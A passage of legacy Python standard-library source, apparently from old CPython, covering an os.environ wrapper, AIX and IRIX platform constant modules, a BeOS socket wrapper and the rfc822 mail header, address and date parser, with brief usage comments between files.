if errno != arg[0]:
exc, arg = error, (errno, msg)
raise exc, arg
# Change environ to automatically call putenv() if it exists
try:
# This will fail if there's no putenv
putenv
except NameError:
pass
else:
import UserDict
if name in ('os2', 'nt', 'dos'): # Where Env Var Names Must Be UPPERCASE
# But we store them as upper case
import string
class _Environ(UserDict.UserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
data = self.data
upper = string.upper
for k, v in environ.items():
data[upper(k)] = v
def __setitem__(self, key, item):
putenv(key, item)
key = string.upper(key)
self.data[key] = item
def __getitem__(self, key):
return self.data[string.upper(key)]
else: # Where Env Var Names Can Be Mixed Case
class _Environ(UserDict.UserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
self.data = environ
def __setitem__(self, key, item):
putenv(key, item)
self.data[key] = item
environ = _Environ(environ)
```
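A small illustration of the recursive helpers above (run from an empty scratch directory on a posix system; illustrative only):

```python
makedirs('tmp_demo/a/b/c')        # creates each missing segment in turn
assert path.isdir('tmp_demo/a/b/c')
removedirs('tmp_demo/a/b/c')      # prunes c, b, a, then tmp_demo itself
assert not path.exists('tmp_demo')
```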
#### File: Lib/plat-aix3/FCNTL.py
```python
TRUE = 1
FALSE = 0
NBBY = 8
FHSIZE = 32
# Included from sys/select.h
# Included from sys/time.h
ITIMER_REAL = 0
ITIMER_VIRTUAL = 1
ITIMER_PROF = 2
ITIMER_VIRT = 3
TIMEOFDAY = 9
TIMERID_ALRM = (ITIMER_REAL)
TIMERID_REAL = (ITIMER_REAL)
TIMERID_VIRTUAL = (ITIMER_VIRTUAL)
TIMERID_PROF = (ITIMER_PROF)
TIMERID_VIRT = (ITIMER_VIRT)
TIMERID_TOD = (TIMERID_VIRT+1)
NALRM = 1
NPROF = 1
NVIRTUAL = 2
NTIMEOFDAY = 5
NTIMERS = (NALRM + NPROF + NVIRTUAL + NTIMEOFDAY)
MIN_SECS_SINCE_EPOCH = 0
uS_PER_SECOND = (1000000)
NS_PER_uS = (1000)
MAX_SECS_TO_uS = 4000
MAX_NS_TO_uS = 294967296
NS_PER_SEC = 1000000000
uS_PER_SEC = (NS_PER_SEC / 1000)
NS_PER_MSEC = (NS_PER_SEC / 1000)
MAX_DEC_SECS = 2
MAX_DEC_NS = 147483647
DST_NONE = 0
DST_USA = 1
DST_AUST = 2
DST_WET = 3
DST_MET = 4
DST_EET = 5
DST_CAN = 6
# Included from time.h
# Included from stddef.h
CLOCKS_PER_SEC = 1000000
CLK_TCK = 100
TIMELEN = 26
NLTBMAX = 64
NO_TIMEOUT = 0
INF_TIMEOUT = -1
def NFDS(x): return ((x) & 0x0000FFFF)
def LOW_HALF(x): return NFDS(x)
def NMSGS(x): return (((x) >> 16) & 0x0000FFFF)
def HIGH_HALF(x): return NMSGS(x)
FD_SETSIZE = 2048
def major(__x): return int(__x) >> 16   # h2py emitted an invalid C-style cast here; assumed Python equivalent
def minor(__x): return (int)((__x)&0xFFFF)
# Included from sys/flock.h
F_RDLCK = 01
F_WRLCK = 02
F_UNLCK = 03
INOFLCK = 1
SETFLCK = 2
SLPFLCK = 4
LCK_UNBLOCK = 0
LCK_BLOCKER = 1
LCK_BLOCKED = 2
LCK_WASBLOCK = 4
MAXEND = 017777777777
RMTLOCK = 1
def ENF_LOCK(mode): return (((mode) & (ISGID | IEXEC | (IEXEC >> 3) | (IEXEC >> 6))) == ISGID)
O_RDONLY = 00000000
O_WRONLY = 00000001
O_RDWR = 00000002
O_ACCMODE = 3
O_NONBLOCK = 00000004
O_APPEND = 00000010
O_CREAT = 00000400
O_TRUNC = 00001000
O_EXCL = 00002000
O_NOCTTY = 00004000
F_DUPFD = 0
F_GETFD = 1
F_SETFD = 2
F_GETFL = 3
F_SETFL = 4
F_GETLK = 5
F_SETLK = 6
F_SETLKW = 7
FD_CLOEXEC = 1
O_SYNC = 00000020
O_NONE = 00000003
O_EXEC = 00000040
O_RSHARE = 00010000
O_DEFER = 00020000
O_DELAY = 00040000
O_NDELAY = 00100000
O_NSHARE = 00200000
F_GETOWN = 8
F_SETOWN = 9
F_CLOSEM = 10
FNDELAY = O_NONBLOCK
O_NDELAY = O_NONBLOCK
FNDELAY = O_NDELAY
FNONBLOCK = O_NONBLOCK
FAPPEND = O_APPEND
FSYNC = O_SYNC
FASYNC = 00400000
FOPEN = (-1)
FREAD = (O_RDONLY-FOPEN)
FWRITE = (O_WRONLY-FOPEN)
FMPX = 00000200
FMASK = 00374377
FFCNTL = (FNONBLOCK|FNDELAY|FAPPEND|FSYNC|FASYNC)
FCREAT = O_CREAT
FTRUNC = O_TRUNC
FEXCL = O_EXCL
FRSHARE = O_RSHARE
FDEFER = O_DEFER
FDELAY = O_DELAY
FNDELAY = O_NDELAY
FNSHARE = O_NSHARE
FEXEC = O_EXEC
FNOCTTY = O_NOCTTY
FMOUNT = 01000000
FREVOKED = 0x20000000
FKERNEL = 0x40000000
FAIO = 00000100
FDOCLONE = 0x10000000
```
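These constants are meant for the fcntl module; for instance, switching a descriptor to non-blocking mode (a generic sketch; the values above are AIX-specific, so this only makes sense on that platform):

```python
import fcntl, os

fd = os.open('/tmp/demo', O_RDWR | O_CREAT)
flags = fcntl.fcntl(fd, F_GETFL, 0)
fcntl.fcntl(fd, F_SETFL, flags | O_NONBLOCK)   # enable non-blocking I/O
os.close(fd)
```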
#### File: Lib/plat-beos/socket.py
```python
"Socket wrapper for BeOS, which does not support dup()."
# (And hence, fromfd() and makefile() are unimplemented in C....)
# XXX Living dangerously here -- close() is implemented by deleting a
# reference. Thus we rely on the real _socket module to close on
# deallocation, and also hope that nobody keeps a reference to our _sock
# member.
try:
from _socket import *
except ImportError:
from socket import *
_realsocketcall = socket
def socket(family, type, proto=0):
return _socketobject(_realsocketcall(family, type, proto))
class _socketobject:
def __init__(self, sock):
self._sock = sock
def close(self):
self._sock = 0
def __del__(self):
self.close()
def accept(self):
sock, addr = self._sock.accept()
return _socketobject(sock), addr
def dup(self):
return _socketobject(self._sock)
def makefile(self, mode='r', bufsize=-1):
return _fileobject(self._sock, mode, bufsize)
_s = "def %s(self, *args): return apply(self._sock.%s, args)\n\n"
for _m in ('bind', 'connect', 'fileno', 'listen',
'getpeername', 'getsockname',
'getsockopt', 'setsockopt',
'recv', 'recvfrom', 'send', 'sendto',
'setblocking',
'shutdown'):
exec _s % (_m, _m)
class _fileobject:
def __init__(self, sock, mode, bufsize):
self._sock = sock
self._mode = mode
if bufsize < 0:
bufsize = 512
self._rbufsize = max(1, bufsize)
self._wbufsize = bufsize
self._wbuf = self._rbuf = ""
def close(self):
try:
if self._sock:
self.flush()
finally:
self._sock = 0
def __del__(self):
self.close()
def flush(self):
if self._wbuf:
self._sock.send(self._wbuf)
self._wbuf = ""
def fileno(self):
return self._sock.fileno()
def write(self, data):
self._wbuf = self._wbuf + data
if self._wbufsize == 1:
if '\n' in data:
self.flush()
else:
if len(self._wbuf) >= self._wbufsize:
self.flush()
def writelines(self, list):
filter(self._sock.send, list)
self.flush()
def read(self, n=-1):
if n >= 0:
while len(self._rbuf) < n:
new = self._sock.recv(self._rbufsize)
if not new: break
self._rbuf = self._rbuf + new
data, self._rbuf = self._rbuf[:n], self._rbuf[n:]
return data
while 1:
new = self._sock.recv(self._rbufsize)
if not new: break
self._rbuf = self._rbuf + new
data, self._rbuf = self._rbuf, ""
return data
def readline(self):
import string
data = ""
i = string.find(self._rbuf, '\n')
while i < 0:
new = self._sock.recv(self._rbufsize)
if not new: break
i = string.find(new, '\n')
if i >= 0: i = i + len(self._rbuf)
self._rbuf = self._rbuf + new
if i < 0: i = len(self._rbuf)
else: i = i+1
data, self._rbuf = self._rbuf[:i], self._rbuf[i:]
return data
def readlines(self):
list = []
while 1:
line = self.readline()
if not line: break
list.append(line)
return list
```
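The exec loop above stamps out one-line delegators from the _s template; the expansion for 'send', written out by hand, is equivalent to:

```python
class _socketobject_send_expanded:
    def send(self, *args):
        return apply(self._sock.send, args)
```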
#### File: Lib/plat-irix6/IN.py
```python
_MIPS_ISA_MIPS1 = 1
_MIPS_ISA_MIPS2 = 2
_MIPS_ISA_MIPS3 = 3
_MIPS_ISA_MIPS4 = 4
_MIPS_SIM_ABI32 = 1
_MIPS_SIM_NABI32 = 2
_MIPS_SIM_ABI64 = 3
# Included from sys/endian.h
LITTLE_ENDIAN = 1234
BIG_ENDIAN = 4321
PDP_ENDIAN = 3412
BYTE_ORDER = BIG_ENDIAN
BYTE_ORDER = LITTLE_ENDIAN
def ntohl(x): return (x)
def ntohs(x): return (x)
def htonl(x): return (x)
def htons(x): return (x)
def htonl(x): return ntohl(x)
def htons(x): return ntohs(x)
# Included from sys/bsd_types.h
# Included from sys/mkdev.h
ONBITSMAJOR = 7
ONBITSMINOR = 8
OMAXMAJ = 0x7f
OMAXMIN = 0xff
NBITSMAJOR = 14
NBITSMINOR = 18
MAXMAJ = 0x1ff
MAXMIN = 0x3ffff
OLDDEV = 0
NEWDEV = 1
MKDEV_VER = NEWDEV
def major(dev): return __major(MKDEV_VER, dev)
def minor(dev): return __minor(MKDEV_VER, dev)
# Included from sys/select.h
# Included from standards.h
FD_SETSIZE = 1024
__NBBY = 8
# Included from string.h
NULL = 0L
NBBY = 8
IPPROTO_IP = 0
IPPROTO_ICMP = 1
IPPROTO_IGMP = 2
IPPROTO_GGP = 3
IPPROTO_IPIP = 4
IPPROTO_ENCAP = IPPROTO_IPIP
IPPROTO_ST = 5
IPPROTO_TCP = 6
IPPROTO_EGP = 8
IPPROTO_PUP = 12
IPPROTO_UDP = 17
IPPROTO_IDP = 22
IPPROTO_TP = 29
IPPROTO_XTP = 36
IPPROTO_RSVP = 46
IPPROTO_HELLO = 63
IPPROTO_ND = 77
IPPROTO_EON = 80
IPPROTO_OSPF = 89
IPPROTO_SWIPE = 94
IPPROTO_RAW = 255
IPPROTO_MAX = 256
IPPORT_RESERVED = 1024
IPPORT_MAXPORT = 65535
def IN_CLASSA(i): return ((int(i) & 0x80000000) == 0)   # h2py '(__int32_t)' casts rewritten as plain ints below
IN_CLASSA_NET = 0xff000000
IN_CLASSA_NSHIFT = 24
IN_CLASSA_HOST = 0x00ffffff
IN_CLASSA_MAX = 128
def IN_CLASSB(i): return ((int(i) & 0xc0000000) == 0x80000000)
IN_CLASSB_NET = 0xffff0000
IN_CLASSB_NSHIFT = 16
IN_CLASSB_HOST = 0x0000ffff
IN_CLASSB_MAX = 65536
def IN_CLASSC(i): return ((int(i) & 0xe0000000) == 0xc0000000)
IN_CLASSC_NET = 0xffffff00
IN_CLASSC_NSHIFT = 8
IN_CLASSC_HOST = 0x000000ff
def IN_CLASSD(i): return ((int(i) & 0xf0000000) == 0xe0000000)
IN_CLASSD_NET = 0xf0000000
IN_CLASSD_NSHIFT = 28
IN_CLASSD_HOST = 0x0fffffff
def IN_MULTICAST(i): return IN_CLASSD(i)
def IN_EXPERIMENTAL(i): return ((int(i) & 0xf0000000) == 0xf0000000)
def IN_BADCLASS(i): return ((int(i) & 0xf0000000) == 0xf0000000)
INADDR_NONE = 0xffffffff
IN_LOOPBACKNET = 127
IP_OPTIONS = 1
IP_HDRINCL = 2
IP_TOS = 3
IP_TTL = 4
IP_RECVOPTS = 5
IP_RECVRETOPTS = 6
IP_RECVDSTADDR = 7
IP_RETOPTS = 8
IP_MULTICAST_IF = 20
IP_MULTICAST_TTL = 21
IP_MULTICAST_LOOP = 22
IP_ADD_MEMBERSHIP = 23
IP_DROP_MEMBERSHIP = 24
IP_MULTICAST_VIF = 25
IP_RSVP_VIF_ON = 26
IP_RSVP_VIF_OFF = 27
IP_RSVP_ON = 28
IP_SENDSRCADDR = 36
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IP_MAX_MEMBERSHIPS = 20
```
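Sanity checks for the classful-address predicates above (illustrative; addresses in host byte order, relying on the plain-int rewrite of the h2py casts noted in the code):

```python
assert IN_CLASSA(0x0A000001)      # 10.0.0.1
assert IN_CLASSB(0x80010001)      # 128.1.0.1
assert IN_CLASSC(0xC0A80101)      # 192.168.1.1
assert IN_MULTICAST(0xE0000001)   # 224.0.0.1
```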
#### File: cpython/Lib/rfc822.py
```python
import string
import time
_blanklines = ('\r\n', '\n') # Optimization for islast()
class Message:
"""Represents a single RFC-822-compliant message."""
def __init__(self, fp, seekable = 1):
"""Initialize the class instance and read the headers."""
if seekable == 1:
# Exercise tell() to make sure it works
# (and then assume seek() works, too)
try:
fp.tell()
except:
seekable = 0
else:
seekable = 1
self.fp = fp
self.seekable = seekable
self.startofheaders = None
self.startofbody = None
#
if self.seekable:
try:
self.startofheaders = self.fp.tell()
except IOError:
self.seekable = 0
#
self.readheaders()
#
if self.seekable:
try:
self.startofbody = self.fp.tell()
except IOError:
self.seekable = 0
def rewindbody(self):
"""Rewind the file to the start of the body (if seekable)."""
if not self.seekable:
raise IOError, "unseekable file"
self.fp.seek(self.startofbody)
def readheaders(self):
"""Read header lines.
Read header lines up to the entirely blank line that
terminates them. The (normally blank) line that ends the
headers is skipped, but not included in the returned list.
        If a non-header line ends the headers (which is an error),
an attempt is made to backspace over it; it is never
included in the returned list.
The variable self.status is set to the empty string if all
went well, otherwise it is an error message.
The variable self.headers is a completely uninterpreted list
of lines contained in the header (so printing them will
reproduce the header exactly as it appears in the file).
"""
self.dict = {}
self.unixfrom = ''
self.headers = list = []
self.status = ''
headerseen = ""
firstline = 1
startofline = unread = tell = None
if hasattr(self.fp, 'unread'):
unread = self.fp.unread
elif self.seekable:
tell = self.fp.tell
while 1:
if tell:
startofline = tell()
line = self.fp.readline()
if not line:
self.status = 'EOF in headers'
break
# Skip unix From name time lines
if firstline and line[:5] == 'From ':
self.unixfrom = self.unixfrom + line
continue
firstline = 0
if headerseen and line[0] in ' \t':
# It's a continuation line.
list.append(line)
x = (self.dict[headerseen] + "\n " + string.strip(line))
self.dict[headerseen] = string.strip(x)
continue
elif self.iscomment(line):
# It's a comment. Ignore it.
continue
elif self.islast(line):
# Note! No pushback here! The delimiter line gets eaten.
break
headerseen = self.isheader(line)
if headerseen:
# It's a legal header line, save it.
list.append(line)
self.dict[headerseen] = string.strip(line[len(headerseen)+2:])
continue
else:
# It's not a header line; throw it back and stop here.
if not self.dict:
self.status = 'No headers'
else:
self.status = 'Non-header line where header expected'
# Try to undo the read.
if unread:
unread(line)
elif tell:
self.fp.seek(startofline)
else:
self.status = self.status + '; bad seek'
break
def isheader(self, line):
"""Determine whether a given line is a legal header.
This method should return the header name, suitably canonicalized.
You may override this method in order to use Message parsing
on tagged data in RFC822-like formats with special header formats.
"""
i = string.find(line, ':')
if i > 0:
return string.lower(line[:i])
else:
return None
def islast(self, line):
"""Determine whether a line is a legal end of RFC-822 headers.
You may override this method if your application wants
to bend the rules, e.g. to strip trailing whitespace,
or to recognise MH template separators ('--------').
For convenience (e.g. for code reading from sockets) a
line consisting of \r\n also matches.
"""
return line in _blanklines
def iscomment(self, line):
"""Determine whether a line should be skipped entirely.
You may override this method in order to use Message parsing
on tagged data in RFC822-like formats that support embedded
comments or free-text data.
"""
return None
def getallmatchingheaders(self, name):
"""Find all header lines matching a given header name.
Look through the list of headers and find all lines
matching a given header name (and their continuation
lines). A list of the lines is returned, without
interpretation. If the header does not occur, an
empty list is returned. If the header occurs multiple
times, all occurrences are returned. Case is not
important in the header name.
"""
name = string.lower(name) + ':'
n = len(name)
list = []
hit = 0
for line in self.headers:
if string.lower(line[:n]) == name:
hit = 1
elif line[:1] not in string.whitespace:
hit = 0
if hit:
list.append(line)
return list
def getfirstmatchingheader(self, name):
"""Get the first header line matching name.
This is similar to getallmatchingheaders, but it returns
only the first matching header (and its continuation
lines).
"""
name = string.lower(name) + ':'
n = len(name)
list = []
hit = 0
for line in self.headers:
if hit:
if line[:1] not in string.whitespace:
break
elif string.lower(line[:n]) == name:
hit = 1
if hit:
list.append(line)
return list
def getrawheader(self, name):
"""A higher-level interface to getfirstmatchingheader().
Return a string containing the literal text of the
header but with the keyword stripped. All leading,
trailing and embedded whitespace is kept in the
string, however.
Return None if the header does not occur.
"""
list = self.getfirstmatchingheader(name)
if not list:
return None
list[0] = list[0][len(name) + 1:]
return string.joinfields(list, '')
def getheader(self, name, default=None):
"""Get the header value for a name.
        This is the normal interface: it returns a stripped
version of the header value for a given header name,
or None if it doesn't exist. This uses the dictionary
version which finds the *last* such header.
"""
try:
return self.dict[string.lower(name)]
except KeyError:
return default
get = getheader
def getaddr(self, name):
"""Get a single address from a header, as a tuple.
An example return value:
('<NAME>', '<EMAIL>')
"""
# New, by <NAME>
alist = self.getaddrlist(name)
if alist:
return alist[0]
else:
return (None, None)
def getaddrlist(self, name):
"""Get a list of addresses from a header.
Retrieves a list of addresses from a header, where each address is a
tuple as returned by getaddr(). Scans all named headers, so it works
properly with multiple To: or Cc: headers for example.
"""
raw = []
for h in self.getallmatchingheaders(name):
if h[0] in ' \t':
raw.append(h)
else:
if raw:
raw.append(', ')
i = string.find(h, ':')
if i > 0:
addr = h[i+1:]
raw.append(addr)
alladdrs = string.join(raw, '')
a = AddrlistClass(alladdrs)
return a.getaddrlist()
def getdate(self, name):
"""Retrieve a date field from a header.
Retrieves a date field from the named header, returning
a tuple compatible with time.mktime().
"""
try:
data = self[name]
except KeyError:
return None
return parsedate(data)
def getdate_tz(self, name):
"""Retrieve a date field from a header as a 10-tuple.
The first 9 elements make up a tuple compatible with
time.mktime(), and the 10th is the offset of the poster's
time zone from GMT/UTC.
"""
try:
data = self[name]
except KeyError:
return None
return parsedate_tz(data)
# Access as a dictionary (only finds *last* header of each type):
def __len__(self):
"""Get the number of headers in a message."""
return len(self.dict)
def __getitem__(self, name):
"""Get a specific header, as from a dictionary."""
return self.dict[string.lower(name)]
def __setitem__(self, name, value):
"""Set the value of a header.
Note: This is not a perfect inversion of __getitem__, because
any changed headers get stuck at the end of the raw-headers list
rather than where the altered header was.
"""
del self[name] # Won't fail if it doesn't exist
self.dict[string.lower(name)] = value
text = name + ": " + value
lines = string.split(text, "\n")
for line in lines:
self.headers.append(line + "\n")
def __delitem__(self, name):
"""Delete all occurrences of a specific header, if it is present."""
name = string.lower(name)
if not self.dict.has_key(name):
return
del self.dict[name]
name = name + ':'
n = len(name)
list = []
hit = 0
for i in range(len(self.headers)):
line = self.headers[i]
if string.lower(line[:n]) == name:
hit = 1
elif line[:1] not in string.whitespace:
hit = 0
if hit:
list.append(i)
list.reverse()
for i in list:
del self.headers[i]
def has_key(self, name):
"""Determine whether a message contains the named header."""
return self.dict.has_key(string.lower(name))
def keys(self):
"""Get all of a message's header field names."""
return self.dict.keys()
def values(self):
"""Get all of a message's header field values."""
return self.dict.values()
def items(self):
"""Get all of a message's headers.
Returns a list of name, value tuples.
"""
return self.dict.items()
def __str__(self):
str = ''
for hdr in self.headers:
str = str + hdr
return str
# Utility functions
# -----------------
# XXX Should fix unquote() and quote() to be really conformant.
# XXX The inverses of the parse functions may also be useful.
def unquote(str):
"""Remove quotes from a string."""
if len(str) > 1:
if str[0] == '"' and str[-1:] == '"':
return str[1:-1]
if str[0] == '<' and str[-1:] == '>':
return str[1:-1]
return str
def quote(str):
"""Add quotes around a string."""
return '"%s"' % string.join(
string.split(
string.join(
string.split(str, '\\'),
'\\\\'),
'"'),
'\\"')
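# Illustrative examples (not in the original file):
#   unquote('"Jane Doe"')           -> 'Jane Doe'
#   unquote('<jane@example.com>')   -> 'jane@example.com'
#   quote('say "hi"')               -> '"say \\"hi\\""'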
def parseaddr(address):
"""Parse an address into a (realname, mailaddr) tuple."""
a = AddrlistClass(address)
list = a.getaddrlist()
if not list:
return (None, None)
else:
return list[0]
class AddrlistClass:
"""Address parser class by Ben Escoto.
To understand what this class does, it helps to have a copy of
RFC-822 in front of you.
Note: this class interface is deprecated and may be removed in the future.
Use rfc822.AddressList instead.
"""
def __init__(self, field):
"""Initialize a new instance.
`field' is an unparsed address header field, containing
one or more addresses.
"""
self.specials = '()<>@,:;.\"[]'
self.pos = 0
self.LWS = ' \t'
self.CR = '\r\n'
self.atomends = self.specials + self.LWS + self.CR
self.field = field
self.commentlist = []
def gotonext(self):
"""Parse up to the start of the next address."""
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS + '\n\r':
self.pos = self.pos + 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
else: break
def getaddrlist(self):
"""Parse all addresses.
Returns a list containing all of the addresses.
"""
ad = self.getaddress()
if ad:
return ad + self.getaddrlist()
else: return []
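    # Sketch (assumed field): AddrlistClass('a@x.org, b@y.org').getaddrlist()
    # returns [('', 'a@x.org'), ('', 'b@y.org')].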
def getaddress(self):
"""Parse the next address."""
self.commentlist = []
self.gotonext()
oldpos = self.pos
oldcl = self.commentlist
plist = self.getphraselist()
self.gotonext()
returnlist = []
if self.pos >= len(self.field):
# Bad email address technically, no domain.
if plist:
returnlist = [(string.join(self.commentlist), plist[0])]
elif self.field[self.pos] in '.@':
# email address is just an addrspec
# this isn't very efficient since we start over
self.pos = oldpos
self.commentlist = oldcl
addrspec = self.getaddrspec()
returnlist = [(string.join(self.commentlist), addrspec)]
elif self.field[self.pos] == ':':
# address is a group
returnlist = []
self.pos = self.pos + 1
while self.pos < len(self.field):
self.gotonext()
if self.field[self.pos] == ';':
self.pos = self.pos + 1
break
returnlist = returnlist + self.getaddress()
elif self.field[self.pos] == '<':
# Address is a phrase then a route addr
routeaddr = self.getrouteaddr()
if self.commentlist:
returnlist = [(string.join(plist) + ' (' + \
string.join(self.commentlist) + ')', routeaddr)]
else: returnlist = [(string.join(plist), routeaddr)]
else:
if plist:
returnlist = [(string.join(self.commentlist), plist[0])]
elif self.field[self.pos] in self.specials:
self.pos = self.pos + 1
self.gotonext()
if self.pos < len(self.field) and self.field[self.pos] == ',':
self.pos = self.pos + 1
return returnlist
def getrouteaddr(self):
"""Parse a route address (Return-path value).
This method just skips all the route stuff and returns the addrspec.
"""
if self.field[self.pos] != '<':
return
expectroute = 0
self.pos = self.pos + 1
self.gotonext()
adlist = None
while self.pos < len(self.field):
if expectroute:
self.getdomain()
expectroute = 0
elif self.field[self.pos] == '>':
self.pos = self.pos + 1
break
elif self.field[self.pos] == '@':
self.pos = self.pos + 1
expectroute = 1
elif self.field[self.pos] == ':':
self.pos = self.pos + 1
expectaddrspec = 1
else:
adlist = self.getaddrspec()
self.pos = self.pos + 1
break
self.gotonext()
return adlist
def getaddrspec(self):
"""Parse an RFC-822 addr-spec."""
aslist = []
self.gotonext()
while self.pos < len(self.field):
if self.field[self.pos] == '.':
aslist.append('.')
self.pos = self.pos + 1
elif self.field[self.pos] == '"':
aslist.append(self.getquote())
elif self.field[self.pos] in self.atomends:
break
else: aslist.append(self.getatom())
self.gotonext()
if self.pos >= len(self.field) or self.field[self.pos] != '@':
return string.join(aslist, '')
aslist.append('@')
self.pos = self.pos + 1
self.gotonext()
return string.join(aslist, '') + self.getdomain()
def getdomain(self):
"""Get the complete domain name from an address."""
sdlist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos = self.pos + 1
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] == '[':
sdlist.append(self.getdomainliteral())
elif self.field[self.pos] == '.':
self.pos = self.pos + 1
sdlist.append('.')
elif self.field[self.pos] in self.atomends:
break
else: sdlist.append(self.getatom())
return string.join(sdlist, '')
def getdelimited(self, beginchar, endchars, allowcomments = 1):
"""Parse a header fragment delimited by special characters.
`beginchar' is the start character for the fragment.
If self is not looking at an instance of `beginchar' then
getdelimited returns the empty string.
`endchars' is a sequence of allowable end-delimiting characters.
Parsing stops when one of these is encountered.
If `allowcomments' is non-zero, embedded RFC-822 comments
are allowed within the parsed fragment.
"""
if self.field[self.pos] != beginchar:
return ''
slist = ['']
quote = 0
self.pos = self.pos + 1
while self.pos < len(self.field):
if quote == 1:
slist.append(self.field[self.pos])
quote = 0
elif self.field[self.pos] in endchars:
self.pos = self.pos + 1
break
elif allowcomments and self.field[self.pos] == '(':
slist.append(self.getcomment())
elif self.field[self.pos] == '\\':
quote = 1
else:
slist.append(self.field[self.pos])
self.pos = self.pos + 1
return string.join(slist, '')
def getquote(self):
"""Get a quote-delimited fragment from self's field."""
return self.getdelimited('"', '"\r', 0)
def getcomment(self):
"""Get a parenthesis-delimited fragment from self's field."""
return self.getdelimited('(', ')\r', 1)
def getdomainliteral(self):
"""Parse an RFC-822 domain-literal."""
return self.getdelimited('[', ']\r', 0)
def getatom(self):
"""Parse an RFC-822 atom."""
atomlist = ['']
while self.pos < len(self.field):
if self.field[self.pos] in self.atomends:
break
else: atomlist.append(self.field[self.pos])
self.pos = self.pos + 1
return string.join(atomlist, '')
def getphraselist(self):
"""Parse a sequence of RFC-822 phrases.
A phrase is a sequence of words, which are in turn either
RFC-822 atoms or quoted-strings. Phrases are canonicalized
by squeezing all runs of continuous whitespace into one space.
"""
plist = []
while self.pos < len(self.field):
if self.field[self.pos] in self.LWS:
self.pos = self.pos + 1
elif self.field[self.pos] == '"':
plist.append(self.getquote())
elif self.field[self.pos] == '(':
self.commentlist.append(self.getcomment())
elif self.field[self.pos] in self.atomends:
break
else: plist.append(self.getatom())
return plist
class AddressList(AddrlistClass):
"""An AddressList encapsulates a list of parsed RFC822 addresses."""
def __init__(self, field):
AddrlistClass.__init__(self, field)
if field:
self.addresslist = self.getaddrlist()
else:
self.addresslist = []
def __len__(self):
return len(self.addresslist)
def __str__(self):
return string.joinfields(map(dump_address_pair, self.addresslist),", ")
def __add__(self, other):
# Set union
newaddr = AddressList(None)
newaddr.addresslist = self.addresslist[:]
for x in other.addresslist:
if not x in self.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __sub__(self, other):
# Set difference
newaddr = AddressList(None)
for x in self.addresslist:
if not x in other.addresslist:
newaddr.addresslist.append(x)
return newaddr
def __getitem__(self, index):
# Make indexing, slices, and 'in' work
        return self.addresslist[index]
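# Usage sketch for the set arithmetic (assumed header values):
#   >>> a = AddressList('one@x.org, two@y.org')
#   >>> b = AddressList('two@y.org')
#   >>> len(a + b), len(a - b)
#   (2, 1)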
def dump_address_pair(pair):
"""Dump a (name, address) pair in a canonicalized form."""
if pair[0]:
return '"' + pair[0] + '" <' + pair[1] + '>'
else:
return pair[1]
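# Example (assumed values):
#   >>> dump_address_pair(('Guido van Rossum', 'guido@python.org'))
#   '"Guido van Rossum" <guido@python.org>'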
# Parse a date field
_monthnames = ['jan', 'feb', 'mar', 'apr', 'may', 'jun', 'jul',
'aug', 'sep', 'oct', 'nov', 'dec',
'january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
_daynames = ['mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun']
# The timezone table does not include the military time zones defined
# in RFC822, other than Z. According to RFC1123, the description in
# RFC822 gets the signs wrong, so we can't rely on any such time
# zones. RFC1123 recommends that numeric timezone indicators be used
# instead of timezone names.
_timezones = {'UT':0, 'UTC':0, 'GMT':0, 'Z':0,
'AST': -400, 'ADT': -300, # Atlantic (used in Canada)
'EST': -500, 'EDT': -400, # Eastern
'CST': -600, 'CDT': -500, # Central
'MST': -700, 'MDT': -600, # Mountain
'PST': -800, 'PDT': -700 # Pacific
}
def parsedate_tz(data):
"""Convert a date string to a time tuple.
Accounts for military timezones.
"""
data = string.split(data)
if data[0][-1] in (',', '.') or string.lower(data[0]) in _daynames:
# There's a dayname here. Skip it
del data[0]
if len(data) == 3: # RFC 850 date, deprecated
stuff = string.split(data[0], '-')
if len(stuff) == 3:
data = stuff + data[1:]
if len(data) == 4:
s = data[3]
i = string.find(s, '+')
if i > 0:
data[3:] = [s[:i], s[i+1:]]
else:
data.append('') # Dummy tz
if len(data) < 5:
return None
data = data[:5]
[dd, mm, yy, tm, tz] = data
mm = string.lower(mm)
if not mm in _monthnames:
dd, mm = mm, string.lower(dd)
if not mm in _monthnames:
return None
mm = _monthnames.index(mm)+1
if dd[-1] == ',':
dd = dd[:-1]
i = string.find(yy, ':')
if i > 0:
yy, tm = tm, yy
if yy[-1] == ',':
yy = yy[:-1]
if yy[0] not in string.digits:
yy, tz = tz, yy
if tm[-1] == ',':
tm = tm[:-1]
tm = string.splitfields(tm, ':')
if len(tm) == 2:
[thh, tmm] = tm
tss = '0'
elif len(tm) == 3:
[thh, tmm, tss] = tm
else:
return None
try:
yy = string.atoi(yy)
dd = string.atoi(dd)
thh = string.atoi(thh)
tmm = string.atoi(tmm)
tss = string.atoi(tss)
except string.atoi_error:
return None
tzoffset=None
tz=string.upper(tz)
if _timezones.has_key(tz):
tzoffset=_timezones[tz]
else:
try:
tzoffset=string.atoi(tz)
except string.atoi_error:
pass
# Convert a timezone offset into seconds ; -0500 -> -18000
if tzoffset:
if tzoffset < 0:
tzsign = -1
tzoffset = -tzoffset
else:
tzsign = 1
tzoffset = tzsign * ( (tzoffset/100)*3600 + (tzoffset % 100)*60)
tuple = (yy, mm, dd, thh, tmm, tss, 0, 0, 0, tzoffset)
return tuple
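# Usage sketch (assumed input):
#   >>> parsedate_tz('Fri, 13 Feb 1998 10:30:00 -0500')
#   (1998, 2, 13, 10, 30, 0, 0, 0, 0, -18000)
# The tenth element is the zone offset in seconds (negative = west of UTC).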
def parsedate(data):
"""Convert a time string to a time tuple."""
t=parsedate_tz(data)
if type(t)==type( () ):
return t[:9]
else: return t
def mktime_tz(data):
"""Turn a 10-tuple as returned by parsedate_tz() into a UTC timestamp."""
if data[9] is None:
# No zone info, so localtime is better assumption than GMT
return time.mktime(data[:8] + (-1,))
else:
t = time.mktime(data[:8] + (0,))
return t - data[9] - time.timezone
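# Sketch: chaining the two converts an RFC-822 date to a POSIX timestamp,
# e.g. mktime_tz(parsedate_tz('Fri, 13 Feb 1998 15:30:00 GMT')) gives
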